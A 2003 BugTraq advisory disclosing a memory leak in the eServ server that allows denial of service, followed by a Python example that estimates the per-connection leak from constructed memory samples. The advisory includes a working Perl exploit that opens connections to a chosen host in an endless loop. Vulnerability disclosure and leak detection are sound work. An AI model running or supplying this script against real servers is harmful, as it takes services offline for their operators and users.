eServ Memory Leak Enables Denial of Service Attacks

----- Original Message -----
From: "Matthew Murphy" <>
To: "BugTraq" <>
Sent: Sunday, May 11, 2003 8:21 AM
Subject: eServ Memory Leak Enables Denial of Service Attacks

> eServ Memory Leak Enables Denial of Service Attacks
> I. Product Description
> eServ is a hybrid Web server (HTTP), FTP server, mail server (POP3, SMTP,
> Finger), news server (NNTP), and proxy server.  It provides all these
> services in a single package, so that administrators are not required to
> multiple different packages to support these protocols.
> II. Vulnerability Description
> eServ's connection handling routine contains a memory leak that may be
> exploited to cause the eServ daemon to become unavailable.  Upon receiving
> a connection, the server allocates a block of memory on the heap between 8
> and 32 kilobytes in size.  The reason for this size variance was not isolated.
> This block of memory is not freed on disconnect, leading it to leak.
> After several thousand successful connections, memory use on the system becomes
> exceedingly high.  If memory use on the system becomes excessively high,
> the system may become unusable.
> III. Impact
> An attacker who can repeatedly establish connections with the eServ daemon
> can cause services running on the vulnerable system (including other
> services outside of eServ's process) to fail.  The vulnerability can
> actually be exploited by accident on high-traffic sites -- each connection
> causes a leak.  After about 1,000 connections, anywhere between 7.81 MB
> and 31.25 MB may leak.
> To deprive an average server system of resources to the point of failure,
> a significant number of connections is required.  After 10,000 connections,
> 78.1 MB to 312.5 MB may leak; in my experience, about 50,000 connections
> sufficient to cause system failure.  At this point, 390.5 MB to 1.52 GB
> leaked.
> IV. Vendor Contact
> I attempted to contact the vendor via and
> The former address bounced, and no response was received from the second
> contact attempt.  eServ has a horrible security record, and I recommend
> using a production server for internet sites.
> V. Exploit
> #!/usr/bin/perl
> #LEGAL NOTICE: Don't test this on networks you don't administer,
> #and do not test this tool on networks you don't own without
> #permission of the network owner.  You are responsible for all
> #damage due to your use of this tool.
> use IO::Socket;
> print "$0: eServ Remote DoS Exploit\r\n";
> print "By Matthew Murphy \<mattmurphy\\>\r\n\r\n";
> print "Server hostname\: ";
> $host = trim(chomp($line = <STDIN>));
> print "Service port to probe\: ";
> $port = trim(chomp($line = <STDIN>));
> print "\r\nBeginning probe -- stop with CTRL+C\r\n";
> while (1) {
>  $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
>  undef $f;
> }
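
The advisory describes memory that is allocated per connection and never released on disconnect. The following is an added example, not part of the original message or of eServ: it fits resident memory against cumulative accepted connections, using only samples taken while no client is connected, to estimate the leak per connection and the connections remaining before a memory limit. The sample tuples, the 1 KiB threshold and the 512 MiB limit are assumptions, and all sample values are constructed.

```python
KIB = 1024
MIB = 1024 * KIB

def leak_per_connection(samples):
    """Least-squares slope of resident memory (bytes) against cumulative
    accepted connections. Only samples with zero active connections are
    used, so memory legitimately held by live sessions is excluded."""
    idle = [(total, rss) for total, active, rss in samples if active == 0]
    if len(idle) < 2:
        raise ValueError("need at least two idle samples")
    mean_x = sum(x for x, _ in idle) / len(idle)
    mean_y = sum(y for _, y in idle) / len(idle)
    sxx = sum((x - mean_x) ** 2 for x, _ in idle)
    if sxx == 0:
        raise ValueError("no new connections between idle samples")
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in idle)
    return sxy / sxx

def assess(samples, mem_limit, threshold=KIB):
    """Flag a leak when idle memory grows by at least `threshold` bytes per
    accepted connection, and project how many more connections fit."""
    slope = leak_per_connection(samples)
    leaking = slope >= threshold
    last_idle_rss = [rss for _, active, rss in samples if active == 0][-1]
    remaining = int((mem_limit - last_idle_rss) // slope) if leaking else None
    return {
        "bytes_per_connection": slope,
        "leaking": leaking,
        # The advisory reports 8 to 32 kilobytes leaked per connection.
        "matches_advisory_range": 8 * KIB <= slope <= 32 * KIB,
        "connections_until_limit": remaining,
    }

# Constructed samples: (cumulative accepted, active now, resident bytes).
BASE = 50 * MIB
LEAKY = [
    (0, 0, BASE),
    (500, 12, BASE + 500 * 20 * KIB + 12 * 64 * KIB),  # busy: ignored
    (1000, 0, BASE + 1000 * 20 * KIB),
    (2000, 0, BASE + 2000 * 20 * KIB),
    (3000, 0, BASE + 3000 * 20 * KIB),
]
HEALTHY = [(0, 0, BASE), (1000, 0, BASE + 4096),
           (2000, 0, BASE), (3000, 0, BASE + 4096)]

if __name__ == "__main__":
    for name, data in (("leaky", LEAKY), ("healthy", HEALTHY)):
        print(name, assess(data, mem_limit=512 * MIB))
```
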
